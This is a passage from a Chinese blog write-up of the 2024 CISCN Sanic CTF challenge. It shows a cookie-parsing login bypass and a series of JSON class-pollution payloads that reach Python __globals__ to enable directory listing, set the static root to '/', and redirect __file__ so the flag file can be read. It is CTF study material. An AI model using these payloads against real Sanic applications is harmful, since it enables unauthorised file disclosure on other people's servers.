<p>跟进<code>Path</code>方法，然后定位到<code>__new__</code> 方法，当用户通过 <code>Path()</code> 创建路径对象时会自动调用<code>__new__</code>方法</p>
<p>这里有个需要注意的点，如果你用的Python版本比较新（例如Python3.12），则<code>__new__</code> 方法内容如下</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008133817598.png"></p>
<p>完全没有可利用的点，在这里卡了很久，跟网上的教程案例不太一样，后面发现是新版本修复了这里，可以通过降低Python版本解决（如Python3.9），但是之前用Python3.12创建的venv环境就不能用了，需要重新创建一个，有点麻烦</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008134149285.png"></p>
<p>发现调用了<code>_from_parts</code>方法，继续跟进</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008134328401.png"></p>
<p>其中<code>self._parts = parts</code> 里的 <code>parts</code> 是 <code>_parse_args</code> 方法解析传入路径参数后得到的路径组成部分列表，假如<code>args</code> 为<code>(&#39;usr/local/bin&#39;,)</code>，那么<code>_parse_args</code> 会把它切分为三部分：drv为空，root为空，parts 为 <code>[&#39;usr&#39;, &#39;local&#39;, &#39;bin&#39;]</code></p>
<p><code>parts</code>会把值传给<code>_parts</code>，我们看能不能控制，尝试访问<code>_parts</code>属性</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008134928001.png"></p>
<p>返回了数组而不是元组，也就是说可以进行修改了，我们可以通过污染<code>_parts</code>来指定目录</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008135056118.png"></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="punctuation">[</span><span class="string">&quot;E:\\test&quot;</span><span class="punctuation">]</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>传入后再重新读取<code>_parts</code>属性，成功修改</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008135645778.png"></p>
<p>本地调试完了，咱们重新回到ctfshow</p>
<h3 id="最终利用"><a href="#最终利用" class="headerlink" title="最终利用"></a>最终利用</h3><p>先访问<code>/login</code>传入Cookie登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user=&quot;adm\073n&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251008135955086.png"></p>
<p>然后污染<code>directory_view</code>为true</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="literal"><span class="keyword">true</span></span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>接着污染<code>directory._parts</code>为根目录</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="punctuation">[</span><span class="string">&quot;/&quot;</span><span class="punctuation">]</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>再次访问<code>/static/</code>查看根目录内容</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008140350414.png"></p>
<p>可以看到flag名为<code>24bcbd0192e591d6ded1_flag</code>，我们污染<code>__file__</code>为目标文件路径</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.__file__&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="string">&quot;/24bcbd0192e591d6ded1_flag&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>然后访问<code>/src</code>读取即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008140649112.png"></p>
<p>至此复现完成，前前后后在网上参考了很多资料，确实挺难的，不过收获挺大，继续加油</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>2024CISCN Sanic复现</p><p><a href="https://waynejoon.github.io/posts/2024CISCN_Sanic/">https://waynejoon.github.io/posts/2024CISCN_Sanic/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-10-08</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计, </a><a class="link-muted" rel="tag" href="/tags/Python%E5%AE%89%E5%85%A8/">Python安全 </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/Python-Stack-Frame-Sandbox-Escape/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">Python栈帧沙箱逃逸</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/java-cc1-gadget-chain-analysis/"><span class="level-item">Java反序列化 CC1链分析</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">28</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">9</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#Sanic框架介绍"><span class="level-left"><span class="level-item">1</span><span class="level-item">Sanic框架介绍</span></span></a></li><li><a class="level is-mobile" href="#题目复现"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目复现</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#起点"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">起点</span></span></a></li><li><a class="level is-mobile" href="#环境准备"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">环境准备</span></span></a></li><li><a class="level is-mobile" href="#绕过方法"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">绕过方法</span></span></a></li><li><a class="level is-mobile" href="#污染链构造"><span class="level-left"><span class="level-item">2.4</span><span class="level-item">污染链构造</span></span></a></li><li><a class="level is-mobile" href="#最终利用"><span class="level-left"><span class="level-item">2.5</span><span class="level-item">最终利用</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2025 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>